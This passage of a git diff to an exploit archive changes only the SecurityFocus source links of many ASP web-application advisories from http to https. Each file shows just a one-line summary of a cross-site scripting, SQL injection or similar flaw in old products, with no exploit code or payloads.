@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14498/info +source: https://www.securityfocus.com/bid/14498/info DVBBS is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/26109.txt b/exploits/asp/webapps/26109.txt index 00895d8f0..7f996365d 100644 --- a/exploits/asp/webapps/26109.txt +++ b/exploits/asp/webapps/26109.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14498/info +source: https://www.securityfocus.com/bid/14498/info DVBBS is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/26154.txt b/exploits/asp/webapps/26154.txt index d28dc7a3f..dec5d9a37 100644 --- a/exploits/asp/webapps/26154.txt +++ b/exploits/asp/webapps/26154.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14575/info +source: https://www.securityfocus.com/bid/14575/info PersianBlog is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/26156.txt b/exploits/asp/webapps/26156.txt index 47d0619e5..bd879b133 100644 --- a/exploits/asp/webapps/26156.txt +++ b/exploits/asp/webapps/26156.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14577/info +source: https://www.securityfocus.com/bid/14577/info CPAINT is prone to an input validation vulnerability. This issue occurs because the application fails to properly sanitize malicious scripts and requests from user-supplied input. diff --git a/exploits/asp/webapps/26291.txt b/exploits/asp/webapps/26291.txt index 3f60a8843..ebdbd27af 100644 --- a/exploits/asp/webapps/26291.txt +++ b/exploits/asp/webapps/26291.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14898/info +source: https://www.securityfocus.com/bid/14898/info Mall23 is prone to an SQL injection vulnerability. This is due to a lack of proper sanitization of user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/26333.html b/exploits/asp/webapps/26333.html index e8237afda..b82735d98 100644 --- a/exploits/asp/webapps/26333.html +++ b/exploits/asp/webapps/26333.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15036/info +source: https://www.securityfocus.com/bid/15036/info Aenovo, aeNovoShop and aeNovoWYSI are prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/26334.txt b/exploits/asp/webapps/26334.txt index f295b4113..9501d6458 100644 --- a/exploits/asp/webapps/26334.txt +++ b/exploits/asp/webapps/26334.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15036/info +source: https://www.securityfocus.com/bid/15036/info Aenovo, aeNovoShop and aeNovoWYSI are prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/26335.txt b/exploits/asp/webapps/26335.txt index 85976e0a4..c587aca07 100644 --- a/exploits/asp/webapps/26335.txt +++ b/exploits/asp/webapps/26335.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15038/info +source: https://www.securityfocus.com/bid/15038/info aeNovo is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/26351.txt b/exploits/asp/webapps/26351.txt index 7cb0b649e..f1273836e 100644 --- a/exploits/asp/webapps/26351.txt +++ b/exploits/asp/webapps/26351.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15118/info +source: https://www.securityfocus.com/bid/15118/info BackOffice Plus is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/26426.html b/exploits/asp/webapps/26426.html index 6caabec8d..8f13d7b01 100644 --- a/exploits/asp/webapps/26426.html +++ b/exploits/asp/webapps/26426.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15215/info +source: https://www.securityfocus.com/bid/15215/info Multiple Techno Dreams scripts are prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the applications to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/26429.txt b/exploits/asp/webapps/26429.txt index 25021fb94..8a267f5a2 100644 --- a/exploits/asp/webapps/26429.txt +++ b/exploits/asp/webapps/26429.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15220/info +source: https://www.securityfocus.com/bid/15220/info ZENworks Patch Management is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/26430.txt b/exploits/asp/webapps/26430.txt index 33bd78d29..7b474d721 100644 --- a/exploits/asp/webapps/26430.txt +++ b/exploits/asp/webapps/26430.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15220/info +source: https://www.securityfocus.com/bid/15220/info ZENworks Patch Management is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/26435.txt b/exploits/asp/webapps/26435.txt index 01af6fef7..03080189d 100644 --- a/exploits/asp/webapps/26435.txt 
+++ b/exploits/asp/webapps/26435.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15233/info +source: https://www.securityfocus.com/bid/15233/info ASP Fast Forum is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/26439.txt b/exploits/asp/webapps/26439.txt index b5042e547..c778bafdf 100644 --- a/exploits/asp/webapps/26439.txt +++ b/exploits/asp/webapps/26439.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15241/info +source: https://www.securityfocus.com/bid/15241/info Snitz Forum is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/26444.txt b/exploits/asp/webapps/26444.txt index bd2eb2b9f..c12844180 100644 --- a/exploits/asp/webapps/26444.txt +++ b/exploits/asp/webapps/26444.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15251/info +source: https://www.securityfocus.com/bid/15251/info Comersus BackOfficePlus and BackOfficeLite are prone to multiple input validation and information disclosure vulnerabilities. diff --git a/exploits/asp/webapps/26445.pl b/exploits/asp/webapps/26445.pl index e59806c6f..2819797d1 100755 --- a/exploits/asp/webapps/26445.pl +++ b/exploits/asp/webapps/26445.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15251/info +source: https://www.securityfocus.com/bid/15251/info Comersus BackOfficePlus and BackOfficeLite are prone to multiple input validation and information disclosure vulnerabilities. diff --git a/exploits/asp/webapps/26473.txt b/exploits/asp/webapps/26473.txt index 95d58c187..c64553fa8 100644 --- a/exploits/asp/webapps/26473.txt +++ b/exploits/asp/webapps/26473.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15329/info +source: https://www.securityfocus.com/bid/15329/info Ocean12 ASP Calendar Manager is prone to an authentication bypass vulnerability. This is due to to an access validation error in the application. diff --git a/exploits/asp/webapps/26537.html b/exploits/asp/webapps/26537.html index b1a0d7d9c..7f835c955 100644 --- a/exploits/asp/webapps/26537.html +++ b/exploits/asp/webapps/26537.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15490/info +source: https://www.securityfocus.com/bid/15490/info VP-ASP Shopping Cart is prone to an HTML injection vulnerability. This is due to a lack of proper validation of user-supplied input before being used in dynamically generated content. diff --git a/exploits/asp/webapps/26701.txt b/exploits/asp/webapps/26701.txt index 448250f64..608cbe055 100644 --- a/exploits/asp/webapps/26701.txt +++ b/exploits/asp/webapps/26701.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15694/info +source: https://www.securityfocus.com/bid/15694/info ASPS Shopping Cart is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/26702.txt b/exploits/asp/webapps/26702.txt index e67a0ce52..c753cd048 100644 --- a/exploits/asp/webapps/26702.txt +++ b/exploits/asp/webapps/26702.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15694/info +source: https://www.securityfocus.com/bid/15694/info ASPS Shopping Cart is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/26704.txt b/exploits/asp/webapps/26704.txt index 162d78d3d..2cf08a6a1 100644 --- a/exploits/asp/webapps/26704.txt +++ b/exploits/asp/webapps/26704.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15695/info +source: https://www.securityfocus.com/bid/15695/info Solupress News is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/26705.txt b/exploits/asp/webapps/26705.txt index 968dbdd36..2f00b7e9c 100644 --- a/exploits/asp/webapps/26705.txt +++ b/exploits/asp/webapps/26705.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15697/info +source: https://www.securityfocus.com/bid/15697/info SiteBeater News is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/26742.txt b/exploits/asp/webapps/26742.txt index a20cd2681..dbf697636 100644 --- a/exploits/asp/webapps/26742.txt +++ b/exploits/asp/webapps/26742.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15731/info +source: https://www.securityfocus.com/bid/15731/info DuPortalPro is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/26743.txt b/exploits/asp/webapps/26743.txt index d999e51e5..ee71947eb 100644 --- a/exploits/asp/webapps/26743.txt +++ b/exploits/asp/webapps/26743.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15734/info +source: https://www.securityfocus.com/bid/15734/info ASPKnowledgeBase is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/26744.txt b/exploits/asp/webapps/26744.txt index 23d6bbcc4..9065a6b9e 100644 --- a/exploits/asp/webapps/26744.txt +++ b/exploits/asp/webapps/26744.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15737/info +source: https://www.securityfocus.com/bid/15737/info NetAuctionHelp is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/26745.txt b/exploits/asp/webapps/26745.txt index 01e206ac6..50e732967 100644 --- a/exploits/asp/webapps/26745.txt +++ b/exploits/asp/webapps/26745.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15740/info +source: https://www.securityfocus.com/bid/15740/info The 'rwAuction Pro' application is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/26746.txt b/exploits/asp/webapps/26746.txt index 21e9d1da2..50be7a502 100644 --- a/exploits/asp/webapps/26746.txt +++ b/exploits/asp/webapps/26746.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15741/info +source: https://www.securityfocus.com/bid/15741/info A-FAQ is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/26747.txt b/exploits/asp/webapps/26747.txt index f143b2c4d..54f6e2578 100644 --- a/exploits/asp/webapps/26747.txt +++ b/exploits/asp/webapps/26747.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15741/info +source: https://www.securityfocus.com/bid/15741/info A-FAQ is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/26759.txt b/exploits/asp/webapps/26759.txt index 04885d7db..9ac893dfe 100644 --- a/exploits/asp/webapps/26759.txt +++ b/exploits/asp/webapps/26759.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15767/info +source: https://www.securityfocus.com/bid/15767/info ASPMForum is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/26760.txt b/exploits/asp/webapps/26760.txt index ac8b580e4..e6ecda894 100644 --- a/exploits/asp/webapps/26760.txt +++ b/exploits/asp/webapps/26760.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15767/info +source: https://www.securityfocus.com/bid/15767/info ASPMForum is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/26777.txt b/exploits/asp/webapps/26777.txt index 39e85fe1d..0af51f484 100644 --- a/exploits/asp/webapps/26777.txt +++ b/exploits/asp/webapps/26777.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15812/info +source: https://www.securityfocus.com/bid/15812/info LocazoList Classifieds is prone to an input validation vulnerability that allows cross-site scripting and SQL injection attacks. diff --git a/exploits/asp/webapps/26820.txt b/exploits/asp/webapps/26820.txt index 7f8e5a022..56c92ab19 100644 --- a/exploits/asp/webapps/26820.txt +++ b/exploits/asp/webapps/26820.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15858/info +source: https://www.securityfocus.com/bid/15858/info XM Forum is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/26821.txt b/exploits/asp/webapps/26821.txt index 5332909b9..0c611f67d 100644 --- a/exploits/asp/webapps/26821.txt +++ b/exploits/asp/webapps/26821.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15859/info +source: https://www.securityfocus.com/bid/15859/info ASPBB is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/26822.txt b/exploits/asp/webapps/26822.txt index 437d9fbd6..b8a5f4df3 100644 --- a/exploits/asp/webapps/26822.txt +++ b/exploits/asp/webapps/26822.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15859/info +source: https://www.securityfocus.com/bid/15859/info ASPBB is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/26823.txt b/exploits/asp/webapps/26823.txt index 4916e2292..8ef408fff 100644 --- a/exploits/asp/webapps/26823.txt +++ b/exploits/asp/webapps/26823.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15859/info +source: https://www.securityfocus.com/bid/15859/info ASPBB is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/26873.txt b/exploits/asp/webapps/26873.txt index 8ec3359b7..7bbc0c776 100644 --- a/exploits/asp/webapps/26873.txt +++ b/exploits/asp/webapps/26873.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15933/info +source: https://www.securityfocus.com/bid/15933/info Acidcat CMS is prone to multiple input validation vulnerabilities. These issues are due to a lack of proper sanitization of user-supplied input. diff --git a/exploits/asp/webapps/26874.txt b/exploits/asp/webapps/26874.txt index 3a994cff3..52891d4e2 100644 --- a/exploits/asp/webapps/26874.txt +++ b/exploits/asp/webapps/26874.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15933/info +source: https://www.securityfocus.com/bid/15933/info Acidcat CMS is prone to multiple input validation vulnerabilities. These issues are due to a lack of proper sanitization of user-supplied input. diff --git a/exploits/asp/webapps/26875.txt b/exploits/asp/webapps/26875.txt index de886b754..37f1b63f1 100644 --- a/exploits/asp/webapps/26875.txt +++ b/exploits/asp/webapps/26875.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15935/info +source: https://www.securityfocus.com/bid/15935/info Allinta CMS is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/26876.txt b/exploits/asp/webapps/26876.txt index 11007a742..f66c95eb3 100644 --- a/exploits/asp/webapps/26876.txt +++ b/exploits/asp/webapps/26876.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15935/info +source: https://www.securityfocus.com/bid/15935/info Allinta CMS is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/26903.txt b/exploits/asp/webapps/26903.txt index a9ca7f0c9..3a90278f0 100644 --- a/exploits/asp/webapps/26903.txt +++ b/exploits/asp/webapps/26903.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15961/info +source: https://www.securityfocus.com/bid/15961/info Baseline CMS is prone to multiple input-validation vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/26926.txt b/exploits/asp/webapps/26926.txt index 09496f7e2..a6094bdad 100644 --- a/exploits/asp/webapps/26926.txt +++ b/exploits/asp/webapps/26926.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16008/info +source: https://www.securityfocus.com/bid/16008/info PortalApp is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/26927.txt b/exploits/asp/webapps/26927.txt index a7710424f..c33e05cb7 100644 --- a/exploits/asp/webapps/26927.txt +++ b/exploits/asp/webapps/26927.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16009/info +source: https://www.securityfocus.com/bid/16009/info SiteEnable is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/26928.txt b/exploits/asp/webapps/26928.txt index 1e29a656e..5834ea26e 100644 --- a/exploits/asp/webapps/26928.txt +++ b/exploits/asp/webapps/26928.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16010/info +source: https://www.securityfocus.com/bid/16010/info IntranetApp is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/26929.txt b/exploits/asp/webapps/26929.txt index b0813d9ac..f19abaafd 100644 --- a/exploits/asp/webapps/26929.txt +++ b/exploits/asp/webapps/26929.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16010/info +source: https://www.securityfocus.com/bid/16010/info IntranetApp is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/26930.txt b/exploits/asp/webapps/26930.txt index 7a5ede03e..7eedbaf51 100644 --- a/exploits/asp/webapps/26930.txt +++ b/exploits/asp/webapps/26930.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16011/info +source: https://www.securityfocus.com/bid/16011/info ProjectApp is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/26931.txt b/exploits/asp/webapps/26931.txt index 2a1af5e76..9d457fe8e 100644 --- a/exploits/asp/webapps/26931.txt +++ b/exploits/asp/webapps/26931.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16011/info +source: https://www.securityfocus.com/bid/16011/info ProjectApp is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/26932.txt b/exploits/asp/webapps/26932.txt index f05a89ba6..33b87289c 100644 --- a/exploits/asp/webapps/26932.txt +++ b/exploits/asp/webapps/26932.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16011/info +source: https://www.securityfocus.com/bid/16011/info ProjectApp is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/26934.txt b/exploits/asp/webapps/26934.txt index e7b185dae..d901ac4d7 100644 --- a/exploits/asp/webapps/26934.txt +++ b/exploits/asp/webapps/26934.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16011/info +source: https://www.securityfocus.com/bid/16011/info ProjectApp is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/26935.txt b/exploits/asp/webapps/26935.txt index 8c27679be..93d9fcb3d 100644 --- a/exploits/asp/webapps/26935.txt +++ b/exploits/asp/webapps/26935.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16011/info +source: https://www.securityfocus.com/bid/16011/info ProjectApp is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/26936.txt b/exploits/asp/webapps/26936.txt index 6d0fbfeb3..db16a6963 100644 --- a/exploits/asp/webapps/26936.txt +++ b/exploits/asp/webapps/26936.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16011/info +source: https://www.securityfocus.com/bid/16011/info ProjectApp is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/26940.txt b/exploits/asp/webapps/26940.txt index 178f0868e..9572d7993 100644 --- a/exploits/asp/webapps/26940.txt +++ b/exploits/asp/webapps/26940.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16015/info +source: https://www.securityfocus.com/bid/16015/info Commercial Interactive Media SCOOP! is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/26941.txt b/exploits/asp/webapps/26941.txt index 6be218fd9..f615b92a6 100644 --- a/exploits/asp/webapps/26941.txt +++ b/exploits/asp/webapps/26941.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16015/info +source: https://www.securityfocus.com/bid/16015/info Commercial Interactive Media SCOOP! is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/26942.txt b/exploits/asp/webapps/26942.txt index 9a8a78370..879c29c6a 100644 --- a/exploits/asp/webapps/26942.txt +++ b/exploits/asp/webapps/26942.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16015/info +source: https://www.securityfocus.com/bid/16015/info Commercial Interactive Media SCOOP! is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/26943.txt b/exploits/asp/webapps/26943.txt index 75c7ed889..a044f5eae 100644 --- a/exploits/asp/webapps/26943.txt +++ b/exploits/asp/webapps/26943.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16015/info +source: https://www.securityfocus.com/bid/16015/info Commercial Interactive Media SCOOP! is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/26944.txt b/exploits/asp/webapps/26944.txt index 1a65a5f92..6b45dfb1a 100644 --- a/exploits/asp/webapps/26944.txt +++ b/exploits/asp/webapps/26944.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16015/info +source: https://www.securityfocus.com/bid/16015/info Commercial Interactive Media SCOOP! is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/26945.txt b/exploits/asp/webapps/26945.txt index 9cb46455c..095801960 100644 --- a/exploits/asp/webapps/26945.txt +++ b/exploits/asp/webapps/26945.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16015/info +source: https://www.securityfocus.com/bid/16015/info Commercial Interactive Media SCOOP! is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/26946.txt b/exploits/asp/webapps/26946.txt index 84f1a6f11..e24e5a874 100644 --- a/exploits/asp/webapps/26946.txt +++ b/exploits/asp/webapps/26946.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16015/info +source: https://www.securityfocus.com/bid/16015/info Commercial Interactive Media SCOOP! is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/26947.txt b/exploits/asp/webapps/26947.txt index f5bc1f2ed..04b8f7faa 100644 --- a/exploits/asp/webapps/26947.txt +++ b/exploits/asp/webapps/26947.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16016/info +source: https://www.securityfocus.com/bid/16016/info Sitekit CMS is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/26948.txt b/exploits/asp/webapps/26948.txt index deff57250..5b1889fde 100644 --- a/exploits/asp/webapps/26948.txt +++ b/exploits/asp/webapps/26948.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16016/info +source: https://www.securityfocus.com/bid/16016/info Sitekit CMS is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/26949.txt b/exploits/asp/webapps/26949.txt index 52a64d3ab..500cce844 100644 --- a/exploits/asp/webapps/26949.txt +++ b/exploits/asp/webapps/26949.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16016/info +source: https://www.securityfocus.com/bid/16016/info Sitekit CMS is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/26963.txt b/exploits/asp/webapps/26963.txt index b3db06ef1..a826468bd 100644 --- a/exploits/asp/webapps/26963.txt +++ b/exploits/asp/webapps/26963.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16022/info +source: https://www.securityfocus.com/bid/16022/info QP7.Enterprise is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/26964.txt b/exploits/asp/webapps/26964.txt index 8fc99b928..e26858dd6 100644 --- a/exploits/asp/webapps/26964.txt +++ b/exploits/asp/webapps/26964.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16022/info +source: https://www.securityfocus.com/bid/16022/info QP7.Enterprise is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/26969.txt b/exploits/asp/webapps/26969.txt index 5665dd66f..ace7612cb 100644 --- a/exploits/asp/webapps/26969.txt +++ b/exploits/asp/webapps/26969.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16034/info +source: https://www.securityfocus.com/bid/16034/info Tangora Portal CMS is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/26991.html b/exploits/asp/webapps/26991.html index be67478b2..638857651 100644 --- a/exploits/asp/webapps/26991.html +++ b/exploits/asp/webapps/26991.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16085/info +source: https://www.securityfocus.com/bid/16085/info Multiple Products by Web Wiz are prone to an SQL injection vulnerability. diff --git a/exploits/asp/webapps/27034.txt b/exploits/asp/webapps/27034.txt index 71477f498..127b755f7 100644 --- a/exploits/asp/webapps/27034.txt +++ b/exploits/asp/webapps/27034.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16155/info +source: https://www.securityfocus.com/bid/16155/info OnePlug CMS is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/27035.txt b/exploits/asp/webapps/27035.txt index c7af7ecfb..da3c974ad 100644 --- a/exploits/asp/webapps/27035.txt +++ b/exploits/asp/webapps/27035.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16155/info +source: https://www.securityfocus.com/bid/16155/info OnePlug CMS is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/27036.txt b/exploits/asp/webapps/27036.txt index 71b6cc754..95658229b 100644 --- a/exploits/asp/webapps/27036.txt +++ b/exploits/asp/webapps/27036.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16155/info +source: https://www.securityfocus.com/bid/16155/info OnePlug CMS is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/27063.txt b/exploits/asp/webapps/27063.txt index 9eaa450b0..66b344f8b 100644 --- a/exploits/asp/webapps/27063.txt +++ b/exploits/asp/webapps/27063.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16196/info +source: https://www.securityfocus.com/bid/16196/info WebWiz Forums is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/27071.txt b/exploits/asp/webapps/27071.txt index c6b3e5087..acbc6b1c8 100644 --- a/exploits/asp/webapps/27071.txt +++ b/exploits/asp/webapps/27071.txt 
